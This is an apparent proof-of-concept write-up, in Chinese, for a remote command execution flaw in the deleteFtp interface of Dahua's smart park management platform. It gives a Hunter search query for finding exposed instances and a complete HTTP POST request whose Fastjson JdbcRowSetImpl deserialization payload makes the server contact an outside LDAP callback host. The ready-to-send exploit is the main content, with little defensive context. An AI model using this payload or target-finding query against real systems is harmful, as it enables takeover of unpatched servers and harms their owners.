POC00/大华智慧园区综合管理平台deleteFtp接口远程命令执行.md
2025-04-02 22:36:18 +08:00

38 lines
1.9 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 大华智慧园区综合管理平台deleteFtp 接口远程命令执行
# 一、漏洞简介
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台旨在为园区提供一站式解决方案包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台deleteFtp 接口远程命令执行,攻击者可通过该漏洞获取服务器权限。
# 二、影响版本
+ 大华智慧园区综合管理平台
# 三、资产测绘
+ hunter:`app.name="Dahua 大华 智慧园区管理平台"`
![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/pOtHG7nJ8gFl98LB/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-790928.png)
+ 登录页面:
![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/pOtHG7nJ8gFl98LB/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-069976.png)
# 四、漏洞复现
<font style="color:rgb(51, 51, 51);">deleteFtp接口存在命令执行漏洞可执行LDAP解析等。</font>
```plain
POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 243
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://tcpj5b.dnslog.cn","autoCommit":true}}}
```
![1701837472770-9787e19a-53f3-4259-a324-e80ff36b084b.png](./img/pOtHG7nJ8gFl98LB/1701837472770-9787e19a-53f3-4259-a324-e80ff36b084b-860944.png)
![1701837487031-7b43ed54-fcc2-4079-9e5a-7d3bce88fb2a.png](./img/pOtHG7nJ8gFl98LB/1701837487031-7b43ed54-fcc2-4079-9e5a-7d3bce88fb2a-784274.png)
> 更新: 2024-02-29 23:57:18
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/il26hyyl70fmzm9e>